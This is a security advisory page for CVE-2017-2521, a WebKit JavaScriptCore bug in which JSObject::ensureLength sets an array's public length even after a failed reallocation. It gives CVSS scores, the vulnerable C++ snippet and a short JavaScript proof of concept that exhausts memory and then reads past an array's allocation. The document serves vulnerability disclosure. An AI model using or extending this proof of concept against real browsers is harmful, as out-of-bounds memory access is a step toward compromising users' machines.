WebKit JSC JSObject::ensureLength Failure Check

2017.06.01
Credit: lokihardt
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

WebKit: JSC: JSObject::ensureLength doesn&#39;t check if ensureLengthSlow failed. CVE-2017-2521 Here's a snippet of JSObject::ensureLength. bool WARN_UNUSED_RETURN ensureLength(VM& vm, unsigned length) { ASSERT(length < MAX_ARRAY_INDEX); ASSERT(hasContiguous(indexingType()) || hasInt32(indexingType()) || hasDouble(indexingType()) || hasUndecided(indexingType())); bool result = true; if (m_butterfly.get()->vectorLength() < length) result = ensureLengthSlow(vm, length); if (m_butterfly.get()->publicLength() < length) m_butterfly.get()->setPublicLength(length); return result; } |setPublicLength| is called whether |ensureLengthSlow| failed or not. So the |publicLength| may be lager than the actual allocated memory's size, which results in an OOB access. Tested on Linux. PoC: const kArrayLength = 0x200000; let arr = new Array(kArrayLength); arr.fill({}); let exh = []; try { for (;;) { exh.push(new ArrayBuffer(kArrayLength * 8 * 8)); } } catch (e) { } try { arr.length *= 8; print('failed'); } catch (e) { print(e); exh = null; print('arr length: ' + arr.length.toString(16)); for (let i = kArrayLength, n = arr.length; i < n; i++) { if (arr[i]) print(arr[i]); } } This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top